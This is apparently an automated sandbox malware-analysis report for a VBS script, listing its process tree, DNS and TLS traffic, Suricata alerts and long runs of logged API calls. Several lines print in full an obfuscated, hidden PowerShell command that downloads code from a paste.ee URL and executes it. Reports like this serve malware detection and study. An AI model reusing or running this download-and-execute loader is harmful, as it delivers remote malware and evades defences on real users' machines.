Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 29, 2024, 4:48 p.m.	July 29, 2024, 4:50 p.m.

Size	8.3KB
Type	ASCII text, with CRLF line terminators
MD5	`ee3604ddfe9c20f08d2bf9e3ec7c7ac5`
SHA256	`2f1a1aad5c36af209e66982d4939a76d8467d474f3c604a5fa3eb173cb3101bd`
CRC32	`80CD52F5`
ssdeep	`192:GiFSTRuYgmY9CfjdUxdNGwpw3xb4FK+F8S7jXsaBZPk+oyRcaMu+JNeitQn4eM8B:Z8tnK`
Yara	Antivirus - Contains references to security software

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\eaz.txt.vbs
2556
- cmd.exe "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/80ee0/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
  2636
  - powershell.exe POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/80ee0/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
    2720

Name	Response	Post-Analysis Lookup
paste.ee	A 172.67.187.200 A 104.21.84.67	172.67.187.200

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.187.200	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49164 -> 172.67.187.200:443	2034978	ET POLICY Pastebin-style Service (paste .ee) in TLS SNI	Potential Corporate Privacy Violation
TCP 192.168.56.101:49164 -> 172.67.187.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2054041	ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee)	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49164 172.67.187.200:443	C=US, O=Google Trust Services, CN=WE1	CN=paste.ee	db:ac:96:3c:aa:07:4d:6f:90:48:a6:34:79:1d:71:cf:4d:ef:d9:c2

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 29, 2024, 4:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2024, 4:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2024, 4:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2024, 4:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 29, 2024, 4:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2024, 4:48 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2024, 4:48 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 29, 2024, 4:48 p.m.			0	0

Command line console output was observed (11 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 29, 2024, 4:48 p.m.	buffer: IsPublic IsSerial Name BaseType console_handle: 0x0000001b	1	1
WriteConsoleW July 29, 2024, 4:48 p.m.	buffer: True True Byte[] System.Array console_handle: 0x00000023	1	1
WriteConsoleW July 29, 2024, 4:48 p.m.	buffer: True True Byte[] System.Array console_handle: 0x00000027	1	1
WriteConsoleW July 29, 2024, 4:48 p.m.	buffer: True True Byte[] System.Array console_handle: 0x0000002b	1	1
WriteConsoleW July 29, 2024, 4:48 p.m.	buffer: Invoke-Expression : The '<' operator is reserved for future use. console_handle: 0x0000003f	1	1
WriteConsoleW July 29, 2024, 4:48 p.m.	buffer: At line:1 char:4 console_handle: 0x0000004b	1	1
WriteConsoleW July 29, 2024, 4:48 p.m.	buffer: + IeX <<<< (NeW-OBJeCT NeT.WeBCLIeNT).DOWNLOADSTRING('https://paste.ee/d/80ee0/ console_handle: 0x00000057	1	1
WriteConsoleW July 29, 2024, 4:48 p.m.	buffer: + CategoryInfo : ParserError: (<:OperatorToken) [Invoke-Expressio console_handle: 0x0000006f	1	1
WriteConsoleW July 29, 2024, 4:48 p.m.	buffer: n], ParseException console_handle: 0x0000007b	1	1
WriteConsoleW July 29, 2024, 4:48 p.m.	buffer: + FullyQualifiedErrorId : RedirectionNotSupported,Microsoft.PowerShell.Com console_handle: 0x00000087	1	1
WriteConsoleW July 29, 2024, 4:48 p.m.	buffer: mands.InvokeExpressionCommand console_handle: 0x00000093	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce5b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceb70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceb70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceb70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceeb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceeb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceeb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceeb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceeb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceeb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003cea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceb70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceb70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceb70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce670 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceb70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceb70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceb70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceb70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceb70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceb70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ceb70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06341de8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06341de8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06341de8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06341de8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06341de8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 4:48 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x06341de8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 29, 2024, 4:48 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://paste.ee/d/80ee0/0

Performs some HTTP requests (1 event)

request

GET https://paste.ee/d/80ee0/0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 161 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72511000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72512000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02633000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02634000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02636000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02653000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02654000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02655000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02656000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02657000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02658000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02659000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a45000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a46000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a47000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a48000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a49000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a4a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a4b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a4c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a4d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a4e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a4f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 4:48 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/80ee0/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
